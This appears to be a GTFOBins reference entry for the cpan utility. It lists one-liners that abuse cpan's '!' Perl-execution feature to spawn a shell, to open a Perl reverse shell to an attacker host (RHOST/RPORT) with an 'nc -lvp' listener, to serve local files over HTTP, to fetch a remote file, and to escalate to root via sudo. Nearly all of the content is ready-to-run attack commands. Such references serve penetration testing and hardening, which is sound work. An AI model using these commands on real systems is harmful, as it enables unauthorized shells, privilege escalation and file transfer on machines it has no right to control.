GTFOBins.github.io/_gtfobins/cpan.md
2018-11-08 20:00:23 +00:00

1.1 KiB

functions
shell reverse-shell file-upload file-download sudo
description code
cpan lets you execute perl commands with `! command` $ cpan cpan[1]> ! exec '/bin/bash'
description code
Run ``nc -lvp RPORT`` on the attacker box to receive the shell. $ cpan cpan[1]> ! use Socket; my $i="RHOST"; my $p=RPORT; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};
description code
Serve files in the local folder running an HTTP server on port 8080. Install dependency via `cpan HTTP::Server::Simple`. $ cpan cpan[1]> ! cpan[1]> ! use HTTP::Server::Simple; my $server= HTTP::Server::Simple->new(); $server->run();
description code
Fetch a remote file via HTTP GET request and store it in PWD. $ cpan cpan[1]> ! use File::Fetch; my $file = (File::Fetch->new(uri => 'http://RHOST/evil.txt'))->fetch();
code
$ sudo cpan cpan[1]> ! exec '/bin/bash'